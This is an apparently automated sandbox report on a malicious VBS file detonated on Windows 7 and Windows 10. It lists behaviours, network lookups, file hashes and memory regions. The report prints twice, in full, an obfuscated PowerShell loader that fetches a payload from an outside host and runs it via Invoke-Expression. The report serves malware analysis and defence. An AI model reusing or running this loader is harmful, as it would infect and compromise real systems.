Malware Analysis Report

2025-01-18 01:14

Sample ID: 240613-g4w5gaxcmb
Target: FILE_SC7678-2024_73664774643_66773635466_904088477321.vbs
SHA256: c1bdaee5fbb07524124295860759ee7feed5eacba39c10c1bb26071093f8c7ff
Tags: execution
Score: 8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 8/10

SHA256: c1bdaee5fbb07524124295860759ee7feed5eacba39c10c1bb26071093f8c7ff

Threat Level: Likely malicious

The file FILE_SC7678-2024_73664774643_66773635466_904088477321.vbs was found to be: Likely malicious.

Malicious Activity Summary

execution

Command and Scripting Interpreter: PowerShell

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-06-13 06:22

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-06-13 06:22
Reported: 2024-06-13 06:24
Platform: win7-20240419-en
Max time kernel: 148s
Max time network: 150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FILE_SC7678-2024_73664774643_66773635466_904088477321.vbs"

Signatures

Command and Scripting Interpreter: PowerShell

Tags: execution

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies system certificate store

Tags: evasion, spyware, trojan

Description | Indicator | Process | Target
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = (certificate blob omitted) | C:\Windows\System32\WScript.exe | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = (certificate blob omitted) | C:\Windows\System32\WScript.exe | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = (certificate blob omitted) | C:\Windows\System32\WScript.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Windows\System32\WScript.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FILE_SC7678-2024_73664774643_66773635466_904088477321.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden "$Stalinorglernes = 1;$darnedest='ring';$spedalskheds='S';Function Udbeningerne($Entitets20){$flskesmaakdet=$Entitets20.Length-$Stalinorglernes;$Devilishness=$spedalskheds+'ubst'+$darnedest;For( $Rebellious=4;$Rebellious -lt $flskesmaakdet;$Rebellious+=5){$Memorability+=$Entitets20.$Devilishness.Invoke( $Rebellious, $Stalinorglernes);}$Memorability;}function sealet($Firemandswhist){ & ($Preflattery) ($Firemandswhist);}$Naos158=Udbeningerne 'K.rdMVedkoSupezUpliiHandlOve,lJi.gaAfst/G,yw5Foge.M,mo0Diap ta l(,illWLedeiDoddnRicidA droDetewHaems.pur Mat.NSkrlTD,na Unde1brdl0F,ne.Rynk0Mode;Desm KlarWS.ksivot.nNorm6W.nd4N,tr;exum Krydxejde6 ,ar4Bihe;Musc CounrCo,ev.ner:Magn1 ,or2 Non1Chon.Sauc0Fa.i)Preb teleGNookeInfec rrek.yldoReag/Abai2 Bar0 Sub1Bayr0,neq0.are1Diel0Aqua1Natu An dFTetriShorrU,leeOpahfO.sho ChaxDoku/Fisk1Frem2Cape1Offs.fo d0 sys ';$Vivified=Udbeningerne 'obs,UkrypsX rneBuskrShea-LockAFpspgHelte AdrnSte.t Pru ';$Frskolealdrenes=Udbeningerne 'BekrhSejut awktSkolp El.s ,um:X no/Go,b/ Dandsagaa ammt ,reeStopaBetvdAmbivMultiUn.oeKendsSkyu.Lkusn Manlover/ .ekcAmoegTr miMixe-Asdib M.tiSkadnRdby/Str,P SecoPos,sTi sn VitaSe,inU ati.ifeaHydrnOpby. Extt Laeh drinR,de ';$Rnen=Udbeningerne 'R,ve>Serv ';$Preflattery=Udbeningerne ' .amiRed.eUninxComp ';$Sammenklumpningernes='Vejgreb';$Fangstkvoten = Udbeningerne 'UndaePo ncDiffhUdbuoKrat ont% DenaIntepCo,tpM.shdGestaUnortWi.pa asa%.iob\ AmoQK,esu Ko.aP.eat SacrA.teaS vvlTill.BabeU.ishn Resrboul Stu,&,ari&Ac n KryeNvnic ,odhrandoPlo. decutT.ma ';sealet (Udbeningerne ',esk$Opo g,utolNo,co PilbtripaFishl Rej:Se,vKGl.erSvajo TempRefad He.uInn eSyn.s.ost= Go,(BuricSjlsmteksd Su, vin/LamecByg. 
Pro$ UnwFAut.aSwarnHomogpetisTidst Refk.enrvDonkoSemitE,teeAn sn ,nk)Atte ');sealet (Udbeningerne 'Mi.j$ RelgPaaslmauloRaabbU spaholll Be,:.lvrRGenee Jo,hBustnHeligSupeemilir ,uvs For1,nfr9 Arc8 B,a= Uan$ KeeFIndur BelsaecikmaxgoAfsllFreme LetaB lllRunhdGar rfriae .hanVarmeSd,ys.eto.NitrsOverp rbelAabei,orstEt r(Par $EsseR Genn Shae PosnKa.s)V kt ');$Frskolealdrenes=$Rehngers198[0];$Curtailed= (Udbeningerne 'Over$ UndgDis,lM ndo xpobBalmaFactlDiak:CoadkSdesa BortPrevhVi.orBanki BronforvsAfs.=Cur.NA,baeFremwMaud-BeduO FonbUdkrj F,bePmkucE,sitBeme Fr nSBovny,napsKurttcoune ,trmRett.FremNAmaleSubstPoro.SkraWB llemos.b,araCEpiglSo si Bile Ud n,rumt');$Curtailed+=$Kropdues[1];sealet ($Curtailed);sealet (Udbeningerne 'Huth$AminkEx.ua letVidehKpperUh,ri A.rnFasts Tet. OveH T ceSlouaEe,edHan eDi,prMlgts.end[ Sem$Mo iVlithi TopvUnfliSvedfLipui miseKapidToxo]T te=Rh,t$Ho.iN ,uba LnsoBurbsStun1Kurs5Acin8Cyli ');$Cyclothurine=Udbeningerne 'Sche$Fej,kcercacos.t.ateh SkarGaliiS,kunabnosHens.Sp.yDInd.oBe.pwChimnCr slDiskoCharaHvald melFhaaniImbelRem,eA nd( ol$AgalFBib.rRegesUndekGlooo nrel .oreDervaOverlEndodHjemrhjoreEstinStj.eAngss T.n,G.av$theaFD,xtaFar.sTophtTj rlselwgDec.gUddaeMeha) Bag ';$Fastlgge=$Kropdues[0];sealet (Udbeningerne 'Iphi$,estgSekulSp,ko ap bHaanaStocl Ov.:MyxoBKo.feIn.ia Pals ,retSperiBarbeOprysSula=Tall( Tr Tper,e arrsE,tetStoo- TypP D,raGovet MamhEx.e kara$ SubF BeraM.rpsGe at In,lp tegf.tagPinaeB dd)kank ');while (!$Beasties) {sealet (Udbeningerne 'Sv.m$Subcg erel An,o Sipb GymaMo,olForg:Ho,mA.okum olb FyseShelr Hex=Mall$ComptSal rAutouInfee Exe ') ;sealet $Cyclothurine;sealet (Udbeningerne 'WhisSDagpt BooaI terBestt Un -MiswS ,apl .oceGo sePirapMud .kol4 Wan ');sealet (Udbeningerne '.rol$Indsg A.blreino Bo bUnf,a Pacl Udb:St.dBTanteMelaaImp,sTen tB,akibhaveS ums.ypo=Good( BarTklkre eursHamstUdsl-BesgP,ygeab,vitGearhblas La,r$ulmeF Astajapasragltyppel oragBoergbeepe,edi)rack ') ;sealet (Udbeningerne 'War,$Itc,g A,hl kapo E.sbMediaEmbolverd:YderSSengtAca 
yAnsvki teeCatetProt=Tope$ Kuag Tm,l ,vioGe.ebpre aOpk.lSlad: F lLCliquReakrHusmi asef RefaAdjukFejls Arm+.yro+ mer% But$FremRsuppe Fjoh hjen .argVrele.erar SlmsDe,e1no,p9Ambo8.est.SmigcErotoGorauBearnSul tSupe ') ;$Frskolealdrenes=$Rehngers198[$Styket];}$Skatteansttelser=295766;$Asylums=27528;sealet (Udbeningerne ' Alt$PinbgP atlUbekoR.stbHumoaSubclMell:annsF enft Hi.pM.li Bogi=Veti ind GNo,aeExset .ef-S ksCMagao NoanForntSna,eSlagnBrastEmpo ara$Ale,FD,akaForesMaz,t Du,lSp,sgMicrgHamse h d ');sealet (Udbeningerne ' Ser$HydrgMonoljewpoTe nbJubiaM ndlPara:,mbePBustuKldnpCornpiag,eBemurOvers Hng Para=rapt Bond[,lkeSAmeny ,als Begt Bo.ePu,lmBurr.K.kaCBuksoFamin V.lvMagre Lyor agbt Fri]Chim:Hove:Fde,F P,erTeksoLastmU,skB Skra i,ds Ho e Nav6Inte4Si,uSLemmtUd.ar ReniSandnFelsg Con(Tegm$FlueFUd at.awbp Ytt),orp ');sealet (Udbeningerne 'Cote$exteg S,elKereoSuumbM niaTilll,ent:ForeTUdenrAlipu SchtRonim revu .amnPinndPosteSub. Tue=Mann livs[TjenSCottyStersindttSynaeAcromBykv. nkaT.mbiepreexGelitretr.scanELakan Be,cBirdo Ta.dChami romnMdergKapn]Unde:Hand: O,lALancSHippCSprjIAu,tIBour.FretGChiae ert eagSExodtRa.ir upiKuglnCompg Frk( .on$S,imPDaymuMuhap BlapStoreudprr ppsNonl)U,de ');sealet (Udbeningerne 'mili$InfugPreqlHemioUnpab ,elaF,rmlM rr:tudsT,ivir nfeDogmg,ariaStrad DreyB.ndnPenseTut,=Spiv$SubbTIstarUnm u bi.tBlanmNa.wuprosnInd.dFodbe Tab. ,ussCheeuRetvbKicksBacktHuser Ka,isyntnBaadgLagu(F.it$,olvSRohokdelmaPur tPar,t.isoe Ba,aLu snG.nns.egltBagst Mi eUdl.lKands Tume Skir abr,Kark$NougAPicksS tiyC.tylDioxuStimm Br,sCrow)Ciga ');sealet $Tregadyne;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Quatral.Unr && echo t"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | dateadvies.nl | udp
US | 8.8.8.8:53 | dateadvies.nl | udp
US | 8.8.8.8:53 | dateadvies.nl | udp
US | 8.8.8.8:53 | dateadvies.nl | udp
US | 8.8.8.8:53 | dateadvies.nl | udp
US | 8.8.8.8:53 | dateadvies.nl | udp
US | 8.8.8.8:53 | dateadvies.nl | udp

Files

C:\Users\Admin\AppData\Local\Temp\CabC81.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\TarCA3.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

memory/2696-25-0x000007FEF56CE000-0x000007FEF56CF000-memory.dmp
memory/2696-26-0x000000001B560000-0x000000001B842000-memory.dmp
memory/2696-27-0x0000000002860000-0x0000000002868000-memory.dmp
memory/2696-28-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
memory/2696-29-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
memory/2696-30-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
memory/2696-31-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
memory/2696-32-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
memory/2696-33-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp
memory/2696-34-0x000007FEF56CE000-0x000007FEF56CF000-memory.dmp
memory/2696-35-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-06-13 06:22
Reported: 2024-06-13 06:24
Platform: win10v2004-20240508-en
Max time kernel: 146s
Max time network: 144s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FILE_SC7678-2024_73664774643_66773635466_904088477321.vbs"

Signatures

Command and Scripting Interpreter: PowerShell

Tags: execution

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FILE_SC7678-2024_73664774643_66773635466_904088477321.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden "$Stalinorglernes = 1;$darnedest='ring';$spedalskheds='S';Function Udbeningerne($Entitets20){$flskesmaakdet=$Entitets20.Length-$Stalinorglernes;$Devilishness=$spedalskheds+'ubst'+$darnedest;For( $Rebellious=4;$Rebellious -lt $flskesmaakdet;$Rebellious+=5){$Memorability+=$Entitets20.$Devilishness.Invoke( $Rebellious, $Stalinorglernes);}$Memorability;}function sealet($Firemandswhist){ & ($Preflattery) ($Firemandswhist);}$Naos158=Udbeningerne 'K.rdMVedkoSupezUpliiHandlOve,lJi.gaAfst/G,yw5Foge.M,mo0Diap ta l(,illWLedeiDoddnRicidA droDetewHaems.pur Mat.NSkrlTD,na Unde1brdl0F,ne.Rynk0Mode;Desm KlarWS.ksivot.nNorm6W.nd4N,tr;exum Krydxejde6 ,ar4Bihe;Musc CounrCo,ev.ner:Magn1 ,or2 Non1Chon.Sauc0Fa.i)Preb teleGNookeInfec rrek.yldoReag/Abai2 Bar0 Sub1Bayr0,neq0.are1Diel0Aqua1Natu An dFTetriShorrU,leeOpahfO.sho ChaxDoku/Fisk1Frem2Cape1Offs.fo d0 sys ';$Vivified=Udbeningerne 'obs,UkrypsX rneBuskrShea-LockAFpspgHelte AdrnSte.t Pru ';$Frskolealdrenes=Udbeningerne 'BekrhSejut awktSkolp El.s ,um:X no/Go,b/ Dandsagaa ammt ,reeStopaBetvdAmbivMultiUn.oeKendsSkyu.Lkusn Manlover/ .ekcAmoegTr miMixe-Asdib M.tiSkadnRdby/Str,P SecoPos,sTi sn VitaSe,inU ati.ifeaHydrnOpby. Extt Laeh drinR,de ';$Rnen=Udbeningerne 'R,ve>Serv ';$Preflattery=Udbeningerne ' .amiRed.eUninxComp ';$Sammenklumpningernes='Vejgreb';$Fangstkvoten = Udbeningerne 'UndaePo ncDiffhUdbuoKrat ont% DenaIntepCo,tpM.shdGestaUnortWi.pa asa%.iob\ AmoQK,esu Ko.aP.eat SacrA.teaS vvlTill.BabeU.ishn Resrboul Stu,&,ari&Ac n KryeNvnic ,odhrandoPlo. decutT.ma ';sealet (Udbeningerne ',esk$Opo g,utolNo,co PilbtripaFishl Rej:Se,vKGl.erSvajo TempRefad He.uInn eSyn.s.ost= Go,(BuricSjlsmteksd Su, vin/LamecByg. 
Pro$ UnwFAut.aSwarnHomogpetisTidst Refk.enrvDonkoSemitE,teeAn sn ,nk)Atte ');sealet (Udbeningerne 'Mi.j$ RelgPaaslmauloRaabbU spaholll Be,:.lvrRGenee Jo,hBustnHeligSupeemilir ,uvs For1,nfr9 Arc8 B,a= Uan$ KeeFIndur BelsaecikmaxgoAfsllFreme LetaB lllRunhdGar rfriae .hanVarmeSd,ys.eto.NitrsOverp rbelAabei,orstEt r(Par $EsseR Genn Shae PosnKa.s)V kt ');$Frskolealdrenes=$Rehngers198[0];$Curtailed= (Udbeningerne 'Over$ UndgDis,lM ndo xpobBalmaFactlDiak:CoadkSdesa BortPrevhVi.orBanki BronforvsAfs.=Cur.NA,baeFremwMaud-BeduO FonbUdkrj F,bePmkucE,sitBeme Fr nSBovny,napsKurttcoune ,trmRett.FremNAmaleSubstPoro.SkraWB llemos.b,araCEpiglSo si Bile Ud n,rumt');$Curtailed+=$Kropdues[1];sealet ($Curtailed);sealet (Udbeningerne 'Huth$AminkEx.ua letVidehKpperUh,ri A.rnFasts Tet. OveH T ceSlouaEe,edHan eDi,prMlgts.end[ Sem$Mo iVlithi TopvUnfliSvedfLipui miseKapidToxo]T te=Rh,t$Ho.iN ,uba LnsoBurbsStun1Kurs5Acin8Cyli ');$Cyclothurine=Udbeningerne 'Sche$Fej,kcercacos.t.ateh SkarGaliiS,kunabnosHens.Sp.yDInd.oBe.pwChimnCr slDiskoCharaHvald melFhaaniImbelRem,eA nd( ol$AgalFBib.rRegesUndekGlooo nrel .oreDervaOverlEndodHjemrhjoreEstinStj.eAngss T.n,G.av$theaFD,xtaFar.sTophtTj rlselwgDec.gUddaeMeha) Bag ';$Fastlgge=$Kropdues[0];sealet (Udbeningerne 'Iphi$,estgSekulSp,ko ap bHaanaStocl Ov.:MyxoBKo.feIn.ia Pals ,retSperiBarbeOprysSula=Tall( Tr Tper,e arrsE,tetStoo- TypP D,raGovet MamhEx.e kara$ SubF BeraM.rpsGe at In,lp tegf.tagPinaeB dd)kank ');while (!$Beasties) {sealet (Udbeningerne 'Sv.m$Subcg erel An,o Sipb GymaMo,olForg:Ho,mA.okum olb FyseShelr Hex=Mall$ComptSal rAutouInfee Exe ') ;sealet $Cyclothurine;sealet (Udbeningerne 'WhisSDagpt BooaI terBestt Un -MiswS ,apl .oceGo sePirapMud .kol4 Wan ');sealet (Udbeningerne '.rol$Indsg A.blreino Bo bUnf,a Pacl Udb:St.dBTanteMelaaImp,sTen tB,akibhaveS ums.ypo=Good( BarTklkre eursHamstUdsl-BesgP,ygeab,vitGearhblas La,r$ulmeF Astajapasragltyppel oragBoergbeepe,edi)rack ') ;sealet (Udbeningerne 'War,$Itc,g A,hl kapo E.sbMediaEmbolverd:YderSSengtAca 
yAnsvki teeCatetProt=Tope$ Kuag Tm,l ,vioGe.ebpre aOpk.lSlad: F lLCliquReakrHusmi asef RefaAdjukFejls Arm+.yro+ mer% But$FremRsuppe Fjoh hjen .argVrele.erar SlmsDe,e1no,p9Ambo8.est.SmigcErotoGorauBearnSul tSupe ') ;$Frskolealdrenes=$Rehngers198[$Styket];}$Skatteansttelser=295766;$Asylums=27528;sealet (Udbeningerne ' Alt$PinbgP atlUbekoR.stbHumoaSubclMell:annsF enft Hi.pM.li Bogi=Veti ind GNo,aeExset .ef-S ksCMagao NoanForntSna,eSlagnBrastEmpo ara$Ale,FD,akaForesMaz,t Du,lSp,sgMicrgHamse h d ');sealet (Udbeningerne ' Ser$HydrgMonoljewpoTe nbJubiaM ndlPara:,mbePBustuKldnpCornpiag,eBemurOvers Hng Para=rapt Bond[,lkeSAmeny ,als Begt Bo.ePu,lmBurr.K.kaCBuksoFamin V.lvMagre Lyor agbt Fri]Chim:Hove:Fde,F P,erTeksoLastmU,skB Skra i,ds Ho e Nav6Inte4Si,uSLemmtUd.ar ReniSandnFelsg Con(Tegm$FlueFUd at.awbp Ytt),orp ');sealet (Udbeningerne 'Cote$exteg S,elKereoSuumbM niaTilll,ent:ForeTUdenrAlipu SchtRonim revu .amnPinndPosteSub. Tue=Mann livs[TjenSCottyStersindttSynaeAcromBykv. nkaT.mbiepreexGelitretr.scanELakan Be,cBirdo Ta.dChami romnMdergKapn]Unde:Hand: O,lALancSHippCSprjIAu,tIBour.FretGChiae ert eagSExodtRa.ir upiKuglnCompg Frk( .on$S,imPDaymuMuhap BlapStoreudprr ppsNonl)U,de ');sealet (Udbeningerne 'mili$InfugPreqlHemioUnpab ,elaF,rmlM rr:tudsT,ivir nfeDogmg,ariaStrad DreyB.ndnPenseTut,=Spiv$SubbTIstarUnm u bi.tBlanmNa.wuprosnInd.dFodbe Tab. ,ussCheeuRetvbKicksBacktHuser Ka,isyntnBaadgLagu(F.it$,olvSRohokdelmaPur tPar,t.isoe Ba,aLu snG.nns.egltBagst Mi eUdl.lKands Tume Skir abr,Kark$NougAPicksS tiyC.tylDioxuStimm Br,sCrow)Ciga ');sealet $Tregadyne;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Quatral.Unr && echo t"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | dateadvies.nl | udp
US | 8.8.8.8:53 | dateadvies.nl | udp
US | 8.8.8.8:53 | dateadvies.nl | udp
US | 8.8.8.8:53 | dateadvies.nl | udp
US | 8.8.8.8:53 | dateadvies.nl | udp
US | 8.8.8.8:53 | dateadvies.nl | udp
US | 8.8.8.8:53 | dateadvies.nl | udp

Files

memory/3500-0-0x00007FFE14673000-0x00007FFE14675000-memory.dmp
memory/3500-1-0x000001CA5D160000-0x000001CA5D182000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b035ebpj.1vt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3500-11-0x00007FFE14670000-0x00007FFE15131000-memory.dmp
memory/3500-12-0x00007FFE14670000-0x00007FFE15131000-memory.dmp
memory/3500-13-0x00007FFE14670000-0x00007FFE15131000-memory.dmp
memory/3500-14-0x00007FFE14670000-0x00007FFE15131000-memory.dmp
memory/3500-15-0x00007FFE14673000-0x00007FFE14675000-memory.dmp
memory/3500-16-0x00007FFE14670000-0x00007FFE15131000-memory.dmp
memory/3500-17-0x00007FFE14670000-0x00007FFE15131000-memory.dmp